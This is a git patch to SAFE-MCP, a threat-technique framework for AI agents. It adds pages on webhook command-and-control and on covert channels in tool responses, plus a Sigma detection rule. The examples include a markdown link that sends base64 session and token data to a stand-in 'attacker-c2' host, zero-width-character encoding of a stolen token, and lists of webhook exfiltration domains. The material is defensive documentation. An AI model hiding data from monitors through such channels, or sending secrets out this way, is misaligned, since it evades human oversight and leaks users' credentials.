From 1f7176d547a3a53ca2e94c5c3f8c3ed02e5cef52 Mon Sep 17 00:00:00 2001 From: hackathons-saurabh Date: Sat, 8 Nov 2025 11:40:53 -0800 Subject: [PATCH 1/2] feat(SAFE-T1901): add Outbound Webhook C2 technique Signed-off-by: hackathons-saurabh --- README.md | 2 +- techniques/SAFE-T1901/README.md | 98 +++++++++++++++++++++++++++++++++ 2 files changed, 99 insertions(+), 1 deletion(-) create mode 100644 techniques/SAFE-T1901/README.md diff --git a/README.md b/README.md index a6f3e9aa..db62d0de 100644 --- a/README.md +++ b/README.md @@ -123,7 +123,7 @@ The SAFE-MCP framework defines 14 tactics that align with the MITRE ATT&CK metho | ATK-TA0009 | Collection | SAFE-T1803 | Database Dump | Use SQL tool to SELECT * from prod DB | | ATK-TA0009 | Collection | SAFE-T1804 | API Data Harvest | Loop over customer REST endpoints via HTTP tool | | ATK-TA0009 | Collection | SAFE-T1805 | Context Snapshot Capture | Query vector store embeddings wholesale | -| **ATK-TA0011** | **Command and Control** | SAFE-T1901 | Outbound Webhook C2 | LLM calls "http.post" to attacker URL with commands/results | +| **ATK-TA0011** | **Command and Control** | [SAFE-T1901](/techniques/SAFE-T1901/README.md) | Outbound Webhook C2 | Abuse of outbound HTTP webhooks for command and control | | ATK-TA0011 | Command and Control | SAFE-T1902 | Covert Channel in Responses | Encode data in whitespace or markdown links returned to chat | | ATK-TA0011 | Command and Control | SAFE-T1903 | Malicious Server Control Channel | Attacker operates rogue server; every tool call doubles as heartbeat | | ATK-TA0011 | Command and Control | SAFE-T1904 | Chat-Based Backchannel | LLM embeds base64 blobs in normal answers that another bot decodes | diff --git a/techniques/SAFE-T1901/README.md b/techniques/SAFE-T1901/README.md new file mode 100644 index 00000000..7aac3fac --- /dev/null +++ b/techniques/SAFE-T1901/README.md @@ -0,0 +1,98 @@ +# SAFE-T1901 : Outbound Webhook C2 + +## Tactic +**Command and Control (ATK-TA0011)** + +--- + +## Description +Outbound Webhook C2 is a technique where an adversary abuses legitimate outbound HTTP webhook mechanisms to establish covert command-and-control (C2) channels from a Model Context Protocol (MCP) environment. +Because MCP agents and tools routinely use HTTPS for integration with external services (Slack, GitHub, Jira, etc.), malicious webhook calls blend with normal traffic, making detection difficult. + +This mirrors MITRE ATT&CK technique [T1567.004 – Exfiltration Over Webhook](https://attack.mitre.org/techniques/T1567/004/) and expands it to AI agent ecosystems. + +--- + +## How It Works +1. **Initial Access** – Attacker gains code execution inside an MCP agent or server (e.g., through malicious tool registration or supply-chain package). +2. **Webhook Setup** – They embed an attacker-controlled URL (`https://discord.com/api/webhooks/...`, `https://hooks.slack.com/services/...`, or custom endpoint) in configuration or environment variables. +3. **Beaconing & Tasking** – The compromised component periodically issues small HTTPS POST requests to the webhook, sending status or encoded data and receiving instructions from the attacker’s channel. +4. **Command Execution / Exfiltration** – Responses from the webhook or attacker messages drive additional actions or data uploads. +5. **Persistence / Evasion** – Traffic appears as benign API usage; the attacker may rotate URLs or use trusted domains to avoid detection. + +--- + +## Examples +- **Malicious packages** in npm and PyPI (2025 reports) that exfiltrated developer tokens to Discord webhooks under benign names like “post-install analytics.” +- **KurayStealer** and similar malware families use Slack and Discord webhooks as lightweight C2 channels to send logs and receive tasks. +- In an enterprise MCP setup, a backdoored tool could POST conversation summaries to a remote webhook every hour, evading firewall rules because HTTPS egress is permitted. + +--- + +## Impact +| Property | Level | Explanation | +|-----------|-------|-------------| +| Confidentiality | **High** | Sensitive data or tokens can leave the organization undetected via legitimate HTTPS channels | +| Integrity | **Medium** | External commands may alter agent behavior or workflow outputs | +| Availability | **Low** | Usually stealthy and low-bandwidth; minor resource impact | + +--- + +## Detection +**Network Indicators** +- Frequent small HTTPS POSTs to rare domains (e.g., `discord.com`, `webhook.site`, dynamic tunnels like `*.ngrok.io`) from MCP hosts not expected to communicate externally. +- Unusual SNI or TLS fingerprints in outbound connections. + +**Host Indicators** +- Config files or .env entries containing webhook-like URLs. +- Tools or scripts embedding HTTP client calls without documented purpose. + +**Example SIEM rule (pseudo-Sigma)** +```yaml +title: Outbound Webhook C2 Detection +logsource: network/proxy +detection: + selection: + url|contains: + - "discord.com/api/webhooks" + - "hooks.slack.com/services" + - "webhook.site" + - "ngrok.io" + method: POST + condition: selection +level: medium +``` + +--- + +## Mitigation +**Preventive** +1. Restrict egress from MCP agents to approved domains (HTTP allow-listing). +2. Proxy all outbound HTTP(S) traffic through a controlled gateway with inspection and rate limits. +3. Disallow hard-coded webhook URLs in code; require secret stores with rotation and audit trails. +4. Require manifest review for tools requesting network capabilities. +5. Implement signed or authenticated webhook payloads and mutual TLS for approved integrations. + +**Detective** +1. Monitor and baseline outbound destinations per server. +2. Scan source repos and pipelines for webhook URL patterns. +3. Correlate proxy logs with MCP task timestamps to spot covert beaconing. + +**Response** +- Block or revoke the malicious webhook URL, rotate tokens, and collect forensic logs. + +--- + +## References +- MITRE ATT&CK – [T1567.004 Exfiltration Over Webhook](https://attack.mitre.org/techniques/T1567/004/) +- CISA Advisory on Webhook Exfiltration (2024) +- Invicti Research – *Securing Webhooks Against Abuse* (2023) +- HackerOne – *Webhook Security Best Practices* (2023) +- Reports on Malicious npm/PyPI Packages Exfiltrating to Discord (Oct 2025) +- KurayStealer Analysis – Use of Discord Webhooks as C2 (2023) + +--- + +## MITRE ATT&CK Mapping +**ATT&CK Technique:** T1567.004 – Exfiltration Over Webhook +**ATT&CK Tactic:** Command and Control (TA0011)** From 3492b4c9b4e69130363544820484e119cd600416 Mon Sep 17 00:00:00 2001 From: hackathons-saurabh Date: Sat, 15 Nov 2025 11:57:41 -0800 Subject: [PATCH 2/2] feat(SAFE-T1902): Add Covert Channel in Responses technique - Comprehensive documentation of steganographic C2 channels in MCP responses - Covers whitespace patterns, zero-width Unicode, markdown links, HTML comments - Includes advanced attack techniques and real-world examples - Detection rules with Sigma format covering multiple encoding methods - Complete mitigation strategies with SAFE-M references - Related to SAFE-T1904 (Chat-Based Backchannel) but focuses on steganography Signed-off-by: hackathons-saurabh --- README.md | 4 +- techniques/SAFE-T1902/README.md | 292 +++++++++++++++++++++++ techniques/SAFE-T1902/detection-rule.yml | 76 ++++++ 3 files changed, 370 insertions(+), 2 deletions(-) create mode 100644 techniques/SAFE-T1902/README.md create mode 100644 techniques/SAFE-T1902/detection-rule.yml diff --git a/README.md b/README.md index db62d0de..3e383007 100644 --- a/README.md +++ b/README.md @@ -124,9 +124,9 @@ The SAFE-MCP framework defines 14 tactics that align with the MITRE ATT&CK metho | ATK-TA0009 | Collection | SAFE-T1804 | API Data Harvest | Loop over customer REST endpoints via HTTP tool | | ATK-TA0009 | Collection | SAFE-T1805 | Context Snapshot Capture | Query vector store embeddings wholesale | | **ATK-TA0011** | **Command and Control** | [SAFE-T1901](/techniques/SAFE-T1901/README.md) | Outbound Webhook C2 | Abuse of outbound HTTP webhooks for command and control | -| ATK-TA0011 | Command and Control | SAFE-T1902 | Covert Channel in Responses | Encode data in whitespace or markdown links returned to chat | +| ATK-TA0011 | Command and Control | [SAFE-T1902](/techniques/SAFE-T1902/README.md) | Covert Channel in Responses | Encode data in whitespace or markdown links returned to chat | | ATK-TA0011 | Command and Control | SAFE-T1903 | Malicious Server Control Channel | Attacker operates rogue server; every tool call doubles as heartbeat | -| ATK-TA0011 | Command and Control | SAFE-T1904 | Chat-Based Backchannel | LLM embeds base64 blobs in normal answers that another bot decodes | +| ATK-TA0011 | Command and Control | [SAFE-T1904](/techniques/SAFE-T1904/README.md) | Chat-Based Backchannel | LLM embeds base64 blobs in normal answers that another bot decodes | | **ATK-TA0010** | **Exfiltration** | SAFE-T1910 | Covert Channel Exfiltration | Data smuggling through tool parameters, error messages, or legitimate-appearing operations | | ATK-TA0010 | Exfiltration | SAFE-T1911 | Parameter Exfiltration | Sneak secrets into unused JSON arg (note) | | ATK-TA0010 | Exfiltration | SAFE-T1912 | Stego Response Exfil | Hide data in code blocks shown to user then copied elsewhere | diff --git a/techniques/SAFE-T1902/README.md b/techniques/SAFE-T1902/README.md new file mode 100644 index 00000000..a9d1b061 --- /dev/null +++ b/techniques/SAFE-T1902/README.md @@ -0,0 +1,292 @@ +# SAFE-T1902: Covert Channel in Responses + +## Overview +**Tactic**: Command and Control (ATK-TA0011) +**Technique ID**: SAFE-T1902 +**Severity**: High +**First Observed**: Research-based analysis (2024-2025) +**Last Updated**: 2025-11-15 + +## Description +Covert Channel in Responses is a sophisticated command-and-control technique where adversaries encode hidden data or instructions within the textual responses returned by MCP servers or AI agents. By exploiting subtle formatting mechanisms—such as whitespace patterns, zero-width Unicode characters, markdown link structures, HTML comments, or ANSI escape codes—attackers can transmit commands, exfiltrate data, or maintain persistent communication channels that bypass standard content inspection and security controls. + +Within MCP ecosystems, this technique is particularly dangerous because tool responses and assistant outputs are routinely displayed to users, logged, or passed between agents without deep syntactic analysis. The covert channel operates "in plain sight," with the visible content appearing benign while invisible or subtly-encoded markers carry malicious payloads. Unlike base64 encoding or encrypted communications that may trigger security alerts, these steganographic methods leverage legitimate text formatting features, making them extremely difficult to detect without specialized analysis. + +## Attack Vectors +- **Primary Vector**: Whitespace steganography using trailing spaces, tabs, or newline patterns to encode binary data +- **Secondary Vectors**: + - Zero-width Unicode characters (U+200B, U+200C, U+200D, U+FEFF) embedding instructions in visible text + - Markdown reference-style links with hidden URLs or encoded data in link definitions + - HTML/XML comments containing base64 or encrypted payloads + - ANSI escape sequences in terminal outputs carrying control commands + - Homoglyph substitution creating visual duplicates with different Unicode codepoints + - Format string manipulation using invisible formatting characters + - Timing-based channels using response latency patterns + - Markdown alt-text or title attributes in images/links carrying encoded data + +## Technical Details + +### Prerequisites +- MCP tool or server capable of generating formatted text responses (markdown, HTML, or plain text) +- Transport mechanism that preserves formatting characters (whitespace, Unicode, escape codes) +- Downstream consumer (agent, user, or automated system) that processes the encoded content +- Lack of normalization or steganography detection in the response pipeline +- Sufficient response size to embed meaningful data without detection + +### Attack Flow +1. **Channel Establishment**: Attacker compromises an MCP tool, server, or gains indirect control through prompt injection +2. **Data Encoding**: Malicious content (commands, credentials, or exfiltration data) is encoded using steganographic techniques +3. **Embedding**: Encoded data is inserted into otherwise legitimate response text using chosen covert channel method +4. **Transmission**: Response passes through MCP protocol, logging systems, and UI without triggering alerts +5. **Extraction**: Cooperating agent, client-side script, or downstream tool extracts the hidden content +6. **Execution**: Decoded instructions are executed, or exfiltrated data reaches the attacker +7. **Feedback Loop**: System continues operating normally, with covert channel persisting across sessions + +### Example Scenario + +**Scenario 1: Whitespace Steganography** +```markdown +Normal response text from an MCP tool appears completely legitimate. +Each line may have trailing spaces that encode binary data. +The visible content discusses weather, tasks, or code examples. +But the pattern of spaces at line endings carries secret commands. +A cooperating client extracts spaces: [2, 4, 2, 5] → Binary: "1010" +``` + +**Scenario 2: Zero-Width Character Encoding** +```json +{ + "tool": "research_assistant", + "response": "Here are your research results:​‌‍​​‌‌\n\nThe report shows positive trends.", + "hidden_instruction": "Zero-width chars between ':' and newline encode: 'exfil_token_ABC123'" +} +``` + +**Scenario 3: Markdown Link Covert Channel** +```markdown +Based on the analysis, I recommend reviewing the [documentation][ref1] and [examples][ref2]. + +[ref1]: https://legitimate-site.com/docs +[ref2]: https://attacker-c2.com/recv?data=eyJzZXNzaW9uIjoiQUJDMTIzIiwidG9rZW4iOiJzZWNyZXQifQ== +``` + +**Scenario 4: HTML Comment Payload** +```html + +

Your request has been processed successfully.

+ +

Please review the results above.

+``` + +### Advanced Attack Techniques (2024-2025 Research) + +According to research from security communities and academic institutions, attackers have developed sophisticated variations: + +1. **Multi-Layer Steganography**: Combining multiple encoding methods (e.g., zero-width chars specify which whitespace pattern to decode) to increase deniability and evade single-method detectors +2. **Adaptive Channel Selection**: Dynamically choosing encoding method based on detected security controls (falling back from HTML comments to whitespace if sanitization is detected) +3. **Error Correction Encoding**: Adding Reed-Solomon or hamming codes to covert channels, allowing data recovery even if some formatting is stripped +4. **Timing Covert Channels**: Varying response latencies by microseconds to encode data, bypassing all text-based analysis +5. **Homoglyph Tunnel**: Using visually-identical Unicode characters (Cyrillic 'а' vs Latin 'a') to create duplicate words carrying different meanings in binary representation +6. **Format Overflow**: Deliberately exceeding expected formatting complexity to force rendering engines into fallback modes that expose hidden content + +## Impact Assessment +- **Confidentiality**: Critical - Complete exfiltration of sensitive data (credentials, prompts, user data, API keys) without triggering DLP or network monitoring +- **Integrity**: High - Injected commands can modify system behavior, manipulate agent decisions, or corrupt data flows +- **Availability**: Low-Medium - Minimal direct impact, though sustained covert channel traffic could cause performance degradation +- **Scope**: Network-wide - Once established, the channel can span multiple agents, tools, and sessions, creating persistent infrastructure + +### Current Threat Landscape (2025) +Security researchers have documented increasing sophistication in covert channel attacks: +- Text-based steganography is being actively researched for AI systems (OWASP LLM Top 10) +- Traditional covert channels (whitespace, timing) have decades of documented use in malware +- Modern Unicode complexity (150,000+ characters) provides vast steganographic space +- AI agents' natural language processing often ignores or normalizes hidden characters inconsistently + +## Detection Methods + +### Indicators of Compromise (IoCs) +- Responses containing unusual Unicode characters (zero-width joiners, direction marks, format controls) +- Systematic patterns in whitespace (consistent trailing spaces, tab patterns) +- Markdown link references pointing to suspicious or uncommon domains +- HTML comments in responses from tools not expected to generate HTML +- Increased entropy in response formatting compared to baseline +- Responses with ANSI escape codes from non-terminal tools +- Homoglyph characters in responses (mixed scripts, unusual Unicode ranges) +- Statistical anomalies in character frequency or formatting consistency +- Correlation between response patterns and subsequent suspicious activities + +### Detection Rules + +**Important**: The following rule is written in Sigma format and contains example patterns only. Attackers continuously develop new encoding techniques and obfuscation methods. Organizations should: +- Use AI-based anomaly detection to identify novel steganographic patterns +- Regularly update detection rules based on threat intelligence +- Implement multiple layers of detection beyond pattern matching +- Consider statistical analysis of character distributions and formatting entropy + +```yaml +title: MCP Covert Channel in Responses Detection +id: 7f3a9d2e-1c4b-4a89-9e2f-8b7d3c5a6e1f +status: experimental +description: Detects potential covert channels in MCP tool responses using steganographic techniques +author: SAFE-MCP Team +date: 2025-11-15 +references: + - https://github.com/SAFE-MCP/safe-mcp/techniques/SAFE-T1902 +logsource: + product: mcp + service: tool_responses +detection: + # Zero-width Unicode characters + selection_unicode: + response_text|contains: + - '\u200B' # Zero-width space + - '\u200C' # Zero-width non-joiner + - '\u200D' # Zero-width joiner + - '\uFEFF' # Zero-width no-break space + - '\u2060' # Word joiner + - '\u180E' # Mongolian vowel separator + + # Suspicious HTML/XML comments + selection_comments: + response_text|re: '' + + # Markdown links to suspicious domains + selection_links: + response_text|contains: + - ']: http://bit.ly/' + - ']: http://tinyurl.com/' + - ']: https://pastebin.com/' + - ']: http://webhook.site/' + - ']: https://ngrok.io/' + - ']: https://discord.com/api/webhooks/' + + # ANSI escape codes in non-terminal contexts + selection_ansi: + response_text|re: '\x1b\[[0-9;]*m' + tool_type: '!terminal' + + # Excessive trailing whitespace + selection_whitespace: + response_text|re: '[ \t]{5,}$' # 5+ spaces/tabs at line end + + # Homoglyph indicators (mixed scripts) + selection_homoglyph: + response_text|re: '[a-zA-Z]*[А-Яа-я]+[a-zA-Z]+' # Latin + Cyrillic mix + + condition: 1 of selection_* + +fields: + - tool_name + - response_text + - timestamp + - user_id + - session_id + +falsepositives: + - Legitimate Unicode formatting in multilingual content + - Markdown links to legitimate URL shorteners + - Terminal tools legitimately using ANSI codes + - Copy-paste artifacts introducing formatting characters + - Internationalized content with mixed scripts + +level: high + +tags: + - attack.command_and_control + - attack.ta0011 + - attack.t1001 # Data Obfuscation + - attack.t1071 # Application Layer Protocol + - safe.t1902 +``` + +### Behavioral Indicators +- Tool responses followed by unexpected network activity to external hosts +- Increased character diversity in responses compared to historical baselines +- Responses containing hidden characters that correlate with subsequent tool invocations +- Statistical deviation in whitespace patterns across sessions +- User copying response text followed by suspicious actions (indicating client-side decoding) +- Response size inflation without corresponding visible content increase +- Consistent formatting anomalies from specific tools or servers + +## Mitigation Strategies + +### Preventive Controls +1. **[SAFE-M-4: Unicode Normalization and Control-Char Stripping](../../mitigations/SAFE-M-4/README.md)**: Normalize all text responses to NFC/NFKC form and strip zero-width characters, format marks, and non-printable Unicode before logging or display. Apply UAX #31 identifier normalization. + +2. **[SAFE-M-21: Output Context Isolation](../../mitigations/SAFE-M-21/README.md)**: Separate tool output rendering from execution contexts. Render responses in sandboxed viewers that cannot trigger actions, preventing covert channel activation. + +3. **[SAFE-M-22: Semantic Output Validation](../../mitigations/SAFE-M-22/README.md)**: Implement content validation that checks for statistical anomalies—excessive whitespace entropy, unusual character frequencies, hidden Unicode ranges—before accepting tool responses. + +4. **[SAFE-M-23: Tool Output Truncation](../../mitigations/SAFE-M-23/README.md)**: Limit response sizes and strip trailing whitespace, HTML comments, and unused markdown reference links to reduce steganographic capacity. + +5. **Whitespace Normalization**: Canonicalize all whitespace to single spaces between words, remove trailing whitespace, and standardize line endings to prevent whitespace-based channels. + +6. **Markdown Sanitization**: Parse and re-serialize markdown to strip unused reference-style links, validate all URLs against allow-lists, and remove HTML blocks from markdown responses. + +7. **Format Stripping for Cross-Agent Communication**: When passing tool outputs between agents or to automation, strip all formatting and convert to plain text, eliminating covert channel substrate. + +8. **Response Entropy Monitoring**: Calculate and baseline Shannon entropy for responses from each tool; alert on significant deviations that might indicate steganographic embedding. + +### Detective Controls +1. **Statistical Anomaly Detection**: Analyze character frequency distributions, Unicode range usage, and formatting pattern regularity across tool responses. Use ML models trained on known-good responses to identify outliers. + +2. **Whitespace Pattern Analysis**: Extract and analyze trailing whitespace patterns for non-random structures that indicate encoding (e.g., consistent patterns across multiple responses). + +3. **URL Reputation Checking**: Extract all URLs from markdown link definitions and validate against threat intelligence feeds; flag shortened URLs, webhooks, and dynamic DNS domains. + +4. **Correlation Analysis**: Link response formatting anomalies with subsequent suspicious activities (network calls, file access, credential usage) to identify active covert channels. + +5. **Format Preservation Auditing**: Log whether responses pass through systems that preserve or strip formatting; identify gaps where steganographic channels could persist. + +### Response Procedures +1. **Immediate Actions**: + - Quarantine sessions showing covert channel indicators; prevent further tool invocations + - Capture full response content including all formatting, whitespace, and hidden characters for forensic analysis + - Block network destinations found in suspicious markdown links or extracted from covert channels + - Rotate any credentials, tokens, or secrets that may have been exfiltrated + +2. **Investigation Steps**: + - Decode suspected covert channel using identified method; determine payload content and intent + - Trace response origin to specific tool or server; examine implementation for compromise + - Review logs for all sessions involving the compromised tool; identify scope of exposure + - Analyze downstream systems that processed the response; check for activation of hidden instructions + - Examine memory, configuration files, and persistence mechanisms for implanted decoders + +3. **Remediation**: + - Update response sanitization rules to normalize or strip the specific encoding method used + - Patch or remove compromised tools; review source code for backdoors or prompt injection vulnerabilities + - Implement enhanced monitoring for the specific tool category or response type exploited + - Conduct red team exercises to validate detection coverage against similar techniques + - Update training data and prompts to make AI agents resilient to covert channel exploitation + +## Related Techniques +- [SAFE-T1904: Chat-Based Backchannel](../SAFE-T1904/README.md) - Uses base64 encoding in responses (more visible than steganography) +- [SAFE-T1402: Instruction Steganography](../SAFE-T1402/README.md) - Hides instructions in tool metadata rather than runtime responses +- [SAFE-T1110: Multimodal Prompt Injection](../SAFE-T1110/README.md) - Steganography in images/audio instead of text +- [SAFE-T1911: Parameter Exfiltration](../SAFE-T1911/README.md) - Exfiltration via tool parameters rather than responses +- [SAFE-T1901: Outbound Webhook C2](../SAFE-T1901/README.md) - Overt HTTP-based C2 vs covert text-based channels + +## References +- [Model Context Protocol Specification](https://modelcontextprotocol.io/specification) +- [OWASP Top 10 for LLM Applications](https://owasp.org/www-project-top-10-for-large-language-model-applications/) +- [NIST AI Risk Management Framework](https://www.nist.gov/itl/ai-risk-management-framework) +- [MITRE ATT&CK T1001: Data Obfuscation](https://attack.mitre.org/techniques/T1001/) +- [Unicode Standard Annex #31: Security Mechanisms](https://www.unicode.org/reports/tr31/) +- [Steganography in Unicode Text - Research Survey](https://arxiv.org/abs/1708.00748) +- [Covert Channels in Computer Networks - Survey (Wendzel et al.)](https://arxiv.org/abs/1406.2001) +- [Zero-Width Character Steganography in Text (Por et al., 2012)](https://ieeexplore.ieee.org/document/6479265) +- [IETF RFC 3514: The Security Flag in the IPv4 Header](https://datatracker.ietf.org/doc/html/rfc3514) - Context on covert channels +- [Whitespace Steganography Techniques in Digital Text](https://www.researchgate.net/publication/220378498) + +## MITRE ATT&CK Mapping +- **Primary**: [TA0011 - Command and Control](https://attack.mitre.org/tactics/TA0011/) +- **Related Techniques**: + - [T1001 - Data Obfuscation](https://attack.mitre.org/techniques/T1001/) - Steganography and protocol impersonation + - [T1071 - Application Layer Protocol](https://attack.mitre.org/techniques/T1071/) - Using standard protocols for C2 + - [T1132 - Data Encoding](https://attack.mitre.org/techniques/T1132/) - Custom encoding schemes + +## Version History +| Version | Date | Changes | Author | +|---------|------|---------|--------| +| 1.0 | 2025-11-15 | Initial documentation of SAFE-T1902 technique | Saurabh Yergattikar | + diff --git a/techniques/SAFE-T1902/detection-rule.yml b/techniques/SAFE-T1902/detection-rule.yml new file mode 100644 index 00000000..097f3bf0 --- /dev/null +++ b/techniques/SAFE-T1902/detection-rule.yml @@ -0,0 +1,76 @@ +title: MCP Covert Channel in Responses Detection +id: 7f3a9d2e-1c4b-4a89-9e2f-8b7d3c5a6e1f +status: experimental +description: Detects potential covert channels in MCP tool responses using steganographic techniques including zero-width characters, whitespace patterns, suspicious links, and HTML comments +author: SAFE-MCP Team / Saurabh Yergattikar +date: 2025-11-15 +references: + - https://github.com/SAFE-MCP/safe-mcp/techniques/SAFE-T1902 + - https://attack.mitre.org/techniques/T1001/ +logsource: + product: mcp + service: tool_responses +detection: + # Zero-width Unicode characters + selection_unicode: + response_text|contains: + - '\u200B' # Zero-width space + - '\u200C' # Zero-width non-joiner + - '\u200D' # Zero-width joiner + - '\uFEFF' # Zero-width no-break space + - '\u2060' # Word joiner + - '\u180E' # Mongolian vowel separator + + # Suspicious HTML/XML comments + selection_comments: + response_text|re: '' + + # Markdown links to suspicious domains + selection_links: + response_text|contains: + - ']: http://bit.ly/' + - ']: http://tinyurl.com/' + - ']: https://pastebin.com/' + - ']: http://webhook.site/' + - ']: https://ngrok.io/' + - ']: https://discord.com/api/webhooks/' + + # ANSI escape codes in non-terminal contexts + selection_ansi: + response_text|re: '\x1b\[[0-9;]*m' + tool_type: '!terminal' + + # Excessive trailing whitespace + selection_whitespace: + response_text|re: '[ \t]{5,}$' # 5+ spaces/tabs at line end + + # Homoglyph indicators (mixed scripts) + selection_homoglyph: + response_text|re: '[a-zA-Z]*[А-Яа-я]+[a-zA-Z]+' # Latin + Cyrillic mix + + condition: 1 of selection_* + +fields: + - tool_name + - response_text + - timestamp + - user_id + - session_id + +falsepositives: + - Legitimate Unicode formatting in multilingual content + - Markdown links to legitimate URL shorteners + - Terminal tools legitimately using ANSI codes + - Copy-paste artifacts introducing formatting characters + - Internationalized content with mixed scripts + - Development/debugging tools that output formatted text + +level: high + +tags: + - attack.command_and_control + - attack.ta0011 + - attack.t1001 # Data Obfuscation + - attack.t1071 # Application Layer Protocol + - safe.t1902 +